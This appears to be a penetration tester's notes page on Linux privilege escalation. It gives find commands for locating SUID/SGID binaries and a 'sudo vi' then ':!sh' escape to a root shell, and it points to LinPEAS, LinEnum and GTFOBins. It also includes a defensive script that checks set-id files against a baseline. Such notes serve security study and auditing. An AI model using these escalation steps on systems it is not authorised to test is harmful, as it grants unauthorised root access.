
Escalation

Common ways an attacker can gain the ability to execute commands with elevated privileges.

SUID / SGID

Find all the SUID/SGID executables

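# Every SUID or SGID regular file, shown as a long listing
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
# Root-owned entries with the SUID bit set
find / -user root -perm /4000
# Same match, listed with ls -ldb
find / -user root -perm -4000 -exec ls -ldb {} \;
# SUID regular files, any owner
find / -perm -u=s -type f 2>/dev/null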
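
For defenders, the same search is most useful as a diff against an approved baseline, so a newly added SUID/SGID file stands out. The script below is an added example, not part of the original notes; the function names and the baseline format (one absolute path per line, # for comment lines) are assumptions.

```shell
#!/bin/sh
# Added example (not from the original notes): flag SUID/SGID files that are
# missing from an approved baseline. Assumed baseline format: one absolute
# path per line, '#' starts a comment line. Paths containing newlines are
# not handled.

# list_setid ROOT: print every regular file under ROOT that has the SUID or
# SGID bit set, sorted bytewise so the output can be fed to comm(1).
list_setid() {
    # -xdev stays on ROOT's filesystem (skips /proc, network mounts, ...).
    # -perm -4000 / -perm -2000 are the octal forms of -perm -u+s / -g+s.
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
        LC_ALL=C sort
}

# unapproved_setid ROOT BASELINE: print set-id files found under ROOT that
# are not listed in BASELINE. Empty output means no drift.
unapproved_setid() {
    approved=$(mktemp) || return 1
    # Drop comments and blank lines, then sort the same way as list_setid.
    grep -v -e '^#' -e '^$' "$2" | LC_ALL=C sort -u > "$approved"
    # comm -23 keeps lines unique to the first input: found but not approved.
    list_setid "$1" | LC_ALL=C comm -23 - "$approved"
    rm -f "$approved"
}

# Usage (after sourcing this file), with a baseline path of your choosing:
#   unapproved_setid / /path/to/setid.baseline
```

Build the first baseline from list_setid output, and add an entry only after reviewing the file it names.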

Escaping Vim

If the user has sudo privileges to run Vim, a shell started from inside the editor runs as root:

sudo vi
:!sh
 
Poof! ...Shell

LinPEAS

LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix*/MacOS hosts.

LinEnum

LinEnum is a simple bash script that runs common commands related to privilege escalation.

GTFOBins

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

Almost all of my Linux escalation notes, such as the Vim example, are techniques taken from GTFOBins, which should be your main resource once you move past enumeration.
